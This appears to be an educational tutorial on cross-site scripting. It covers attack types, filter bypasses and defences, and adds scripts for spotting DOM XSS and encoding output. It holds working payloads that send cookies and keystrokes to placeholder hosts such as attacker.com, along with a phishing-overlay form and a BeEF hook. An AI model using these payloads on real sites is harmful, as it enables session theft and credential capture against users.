Cross-Site Scripting (XSS) is a client-side code injection attack in which an attacker gets malicious script served from a trusted website. XSS allows attackers to execute arbitrary JavaScript in victims' browsers, potentially stealing credentials or session tokens, or performing actions on behalf of the user.
What is XSS?
XSS occurs when a web application includes untrusted data in its output without proper validation or encoding. This allows attackers to inject client-side scripts that execute in other users' browsers.
Types of XSS Attacks
1. Reflected XSS
The malicious script arrives in the current HTTP request and is reflected back into the immediate response. It is commonly exploited through search boxes, error messages, or URL parameters, and delivered by getting the victim to open a crafted link.
# Vulnerable code example
<p>Search results for: <?php echo $_GET['query']; ?></p>
# Attack payload
http://victim.com/search?query=<script>alert(document.cookie)</script>
# More stealthy payload
http://victim.com/search?query=<script src="http://evil.com/steal.js"></script>
# Image-based XSS
<img src=x onerror="alert('XSS')">
# Event handler XSS
<body onload="alert('XSS')">
2. Stored XSS (Persistent XSS)
The malicious script is permanently stored on the target server (database, message forum, comment field, etc.) and served to users when they request the stored information.
# Attack scenario: Forum comment
Username: HackerUser
Comment: Great article! <script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>
# When other users view the comment, the script executes
# Stealing session cookies, tokens, or performing actions
# Profile page XSS
Bio: <img src=x onerror="this.src='http://evil.com/log?cookie='+document.cookie">
# Comment section payload
<svg onload="new Image().src='http://attacker.com/steal?c='+document.cookie">
3. DOM-Based XSS
The vulnerability exists in client-side code rather than server-side code: JavaScript reads attacker-controlled data from a source such as location.hash and passes it to a sink that interprets it as HTML or code. When the payload rides in the URL fragment (after #), it is never sent to the server, so server-side filters and logs never see it.
# Vulnerable JavaScript code
document.getElementById('welcome').innerHTML = "Welcome " + location.hash.substring(1);
# Attack URL (a <script> tag inserted through innerHTML is not executed by browsers, so an event-handler vector is used instead)
http://victim.com/page.html#<img src=x onerror=alert(document.cookie)>
# Another DOM XSS example
var name = document.location.search.substring(1);
document.write("Hello " + name);
# Attack: http://victim.com/welcome?<script>alert('XSS')</script>
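Both DOM XSS examples above follow the same shape: data from a source the attacker controls reaches a sink that parses HTML or evaluates code. The script below is an added example, not code from the original page, that triages JavaScript source for that pattern. The source and sink lists are the usual ones and the sample lines are constructed; it is a grep-style review aid, not a taint tracker, so it misses flows through function calls and reports false positives.

```javascript
// Added example, not code from the original page: a grep-style triage for
// DOM-based XSS candidates. It flags lines where an attacker-controlled source
// (URL fragment, query string, referrer, window.name, postMessage data) reaches
// a sink that parses HTML or evaluates code, and it carries taint across lines
// only for the simple case of a variable assigned directly from a source.
// Every hit still needs manual verification.

const SOURCES = [
  /\blocation\.(hash|search|pathname)\b/,
  /\bdocument\.(URL|documentURI|referrer|cookie)\b/,
  /\bwindow\.name\b/,
  /\b(event|e|msg)\.data\b/,                         // postMessage handler argument
];

const SINKS = [
  /\.(innerHTML|outerHTML)\s*=/,
  /\.insertAdjacentHTML\s*\(/,
  /\bdocument\.write(ln)?\s*\(/,
  /\beval\s*\(/,
  /\b(setTimeout|setInterval|Function)\s*\(\s*["'`]/,  // code passed as a string
  /\blocation(\.href)?\s*=[^=]/,                        // navigation to javascript: URLs
  /\$\([^)]*\)\.(html|append|prepend|after|before)\s*\(/, // jQuery HTML sinks
];

function findDomXssCandidates(lines) {
  const hits = [];
  const tainted = new Set(); // identifiers assigned from a source on an earlier line
  lines.forEach((line, i) => {
    const src = SOURCES.find((re) => re.test(line));
    let sourceName = src ? src.source : null;
    if (!sourceName) {
      const id = [...tainted].find((v) => new RegExp(`\\b${v}\\b`).test(line));
      if (id) sourceName = `${id} (tainted on an earlier line)`;
    }
    const sink = SINKS.find((re) => re.test(line));
    if (sourceName && sink) {
      hits.push({ line: i + 1, source: sourceName, sink: sink.source, code: line.trim() });
    }
    // Remember "var x = <source>..." so a later sink using x is still reported.
    const decl = line.match(/\b(?:var|let|const)\s+(\w+)\s*=/);
    if (decl && src) tainted.add(decl[1]);
  });
  return hits;
}

// Constructed sample: the page's two vulnerable snippets plus safe lines.
const SAMPLE_JS = [
  "document.getElementById('welcome').innerHTML = 'Welcome ' + location.hash.substring(1);",
  "var name = document.location.search.substring(1);",
  "document.write('Hello ' + name);",
  "document.getElementById('welcome').textContent = location.hash.substring(1); // safe sink",
  "const title = 'Static title';",
  "document.getElementById('h').innerHTML = title;",
];

for (const h of findDomXssCandidates(SAMPLE_JS)) {
  console.log(`line ${h.line}: ${h.source} -> ${h.sink}\n    ${h.code}`);
}
```

Run against the sample it reports lines 1 and 3 and stays quiet on the textContent assignment and the static title, which is the distinction a reviewer wants: the fix for DOM XSS is to route user data into text-only sinks such as textContent, not to filter the string.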
Advanced XSS Techniques
Bypassing XSS Filters
# Case variation
<ScRiPt>alert('XSS')</sCrIpT>
# Encoding techniques
<script>alert(String.fromCharCode(88,83,83))</script>
# Legacy only: javascript: URLs in a src attribute executed in IE6-era browsers and are ignored by every modern one
<img src="javascript:alert('XSS')">
# Event handlers
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
<body onpageshow=alert('XSS')>
# HTML5 vectors
<video src=x onerror=alert('XSS')>
<audio src=x onerror=alert('XSS')>
# Null byte injection (legacy: old Internet Explorer ignored a null byte inside a tag name; modern browsers do not)
<scri%00pt>alert('XSS')</script>
# Unicode escapes are interpreted only inside JavaScript source, not in HTML tag names, so they hide the function name rather than the tag
<script>\u0061\u006c\u0065\u0072\u0074('XSS')</script>
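Every bypass above works for the same reason: a blacklist filter only knows the vectors its author thought of. The block below is an added example, not code from the original page; naiveStripScript is a constructed stand-in for the "remove script tags" filters real applications have shipped, and it is scored against the page's own vectors plus the tag-splitting trick that makes a single-pass strip assemble the forbidden tag.

```javascript
// Added example, not code from the original page: a constructed blacklist
// filter of the "strip <script> tags" kind, scored against XSS bypass vectors.

function naiveStripScript(input) {
  // One case-insensitive pass that deletes <script ...> and </script> tags.
  return input.replace(/<\/?script\b[^>]*>/gi, '');
}

// Crude check used only to score the filter: does the output still contain
// a script tag or an on* event handler attribute?
function stillExecutable(html) {
  return /<script\b/i.test(html) || /\bon\w+\s*=/i.test(html);
}

// Constructed payload set: the plain tag, the page's case-variation and
// event-handler vectors, and the tag-splitting trick that reassembles
// <script> after exactly one strip pass.
const PAYLOADS = {
  plain:        "<script>alert('XSS')</script>",
  caseVariant:  "<ScRiPt>alert('XSS')</sCrIpT>",
  tagSplitting: "<scr<script>ipt>alert('XSS')</scr</script>ipt>",
  eventHandler: "<img src=x onerror=alert('XSS')>",
  svgOnload:    "<svg/onload=alert('XSS')>",
};

function evaluateFilter(filter, payloads) {
  const report = {};
  for (const [name, payload] of Object.entries(payloads)) {
    const output = filter(payload);
    report[name] = { output, bypassed: stillExecutable(output) };
  }
  return report;
}

for (const [name, r] of Object.entries(evaluateFilter(naiveStripScript, PAYLOADS))) {
  console.log(`${r.bypassed ? 'BYPASSED' : 'blocked '}  ${name}: ${r.output}`);
}
```

The filter stops the plain and case-varied tags and nothing else: the tag-splitting payload comes out as a clean `<script>` tag, and the two event-handler vectors pass through untouched. The remedy is not a longer blacklist but context-aware output encoding, covered under Prevention and Mitigation.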
XSS Exploitation Payloads
# Cookie stealing
<script>new Image().src="http://attacker.com/steal?c="+document.cookie;</script>
# Keylogging
<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/log?key='+e.key);
}
</script>
# Phishing overlay
<script>
document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Session Expired</h1><form action="http://attacker.com/phish">Username: <input name="user">Password: <input type="password" name="pass"><input type="submit"></form></div>';
</script>
# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>
XSS Testing Tools
Manual Testing
# Basic test payloads
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
"><script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Polyglot XSS (works in multiple contexts)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Automated Tools
- XSStrike: Advanced XSS detection and exploitation suite
- Burp Suite: Professional web vulnerability scanner
- OWASP ZAP: Open-source web application security scanner
- XSSer: Automated framework for detecting and exploiting XSS
- DalFox: Fast, powerful XSS scanner and parameter analyzer
Prevention and Mitigation
Defense Strategies
Implementing multiple layers of protection is crucial for preventing XSS attacks.
1. Input Validation
- Validate all user input against a whitelist of acceptable values
- Reject input containing unexpected characters
- Use strict type checking
- Treat validation as defense in depth, not a substitute for output encoding: an apostrophe in a surname is legitimate input, but it is dangerous the moment it lands unencoded inside a JavaScript string
2. Output Encoding
# HTML Entity Encoding (for data placed in HTML body text or inside a quoted attribute value)
& becomes &amp;
< becomes &lt;
> becomes &gt;
" becomes &quot;
' becomes &#x27;
/ becomes &#x2F;
# JavaScript encoding
Data placed inside a <script> block or an event handler must be escaped for the JavaScript context (\xHH or \uXXXX form, or serialized with JSON.stringify with < and > additionally escaped so the string can never contain </script>); HTML entity encoding does nothing there
# URL encoding
Percent-encode user data placed in a URL parameter (encodeURIComponent); when user data forms a whole URL, also reject any scheme other than http or https, because a javascript: URL is not neutralized by encoding
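The encoders below are an added example, not code from the original page, showing one function per output context and the reflected-search page from earlier rendered safely in all four contexts (HTML body, quoted attribute, JavaScript string, URL parameter). The function names and the sample payload are this example's own.

```javascript
// Added example, not code from the original page: context-aware output
// encoding. Each function targets one output context; using the wrong one
// (for example HTML encoding inside a JavaScript string) leaves the sink open.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

// HTML body text and quoted attribute values.
function encodeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Unquoted attribute values: every non-alphanumeric character is encoded,
// because a space, '/' or '=' can end the value and start a new attribute.
function encodeHtmlAttrUnquoted(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// JavaScript string literal context: JSON.stringify handles quotes,
// backslashes and control characters; the second pass turns '<', '>' and the
// JS line terminators U+2028/U+2029 into \u escapes so the literal can never
// contain "</script>" or break out of the string.
function encodeJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL query parameter context.
function encodeUrlParam(s) {
  return encodeURIComponent(String(s));
}

// The page's reflected-search example, rendered safely for each context.
function renderSearchPage(query) {
  return [
    `<p>Search results for: ${encodeHtml(query)}</p>`,
    `<input type="text" name="query" value="${encodeHtml(query)}">`,
    `<script>var lastQuery = ${encodeJsString(query)};</script>`,
    `<a href="/search?query=${encodeUrlParam(query)}">Search again</a>`,
  ].join('\n');
}

// Constructed payload: the page's reflected-XSS attack string.
console.log(renderSearchPage('<script>alert(document.cookie)</script>'));
```

Note what the JavaScript context needs that the HTML context does not: inside `<script>` the browser's HTML parser ends the block at the first `</script>` regardless of JavaScript string quoting, so `<` and `>` must be escaped as `\u003c` and `\u003e` even though JSON.stringify leaves them alone.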
3. Content Security Policy (CSP)
# HTTP Header
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.com;
# Meta tag (a fallback when response headers cannot be set; frame-ancestors, sandbox and report-uri are ignored in meta form)
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
# Strict CSP ('random123' is a placeholder: the nonce must be unpredictable and freshly generated for every response, or an attacker who learns it can reuse it)
Content-Security-Policy: default-src 'none'; script-src 'nonce-random123' 'strict-dynamic'; style-src 'self'; base-uri 'none';
4. HTTP-Only Cookies
Set cookies with the HttpOnly flag so document.cookie cannot read them. This blunts cookie theft but does not stop XSS itself: the injected script still runs inside the user's authenticated session and can issue requests on the user's behalf directly.
Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict
5. Framework-Specific Protection
- React: Automatic escaping in JSX (but beware of dangerouslySetInnerHTML and user-supplied javascript: URLs in href)
- Angular: Interpolated values are escaped and bound HTML is sanitized (bypassSecurityTrustHtml and direct DOM access through ElementRef.nativeElement skip this)
- Vue.js: Automatic HTML escaping in templates (v-html renders raw HTML)
- Django: Auto-escaping in templates (the |safe filter and mark_safe() disable it)
Ethical Use Only
This information is for educational purposes and authorized security testing only. Unauthorized exploitation of XSS vulnerabilities is illegal and unethical.
HackHub Professional Services
Expert XSS Testing & Remediation
The HackHub team specializes in identifying and remediating XSS vulnerabilities across web applications. With 10+ years of experience, we provide comprehensive security assessments to protect your applications from client-side attacks.
Contact [email protected] for professional web security services.
Conclusion
Cross-Site Scripting remains one of the most prevalent web application vulnerabilities. Understanding the different types of XSS and their exploitation techniques, and implementing comprehensive defense strategies, is essential for securing modern web applications. Regular security testing and developer education are key to preventing XSS attacks.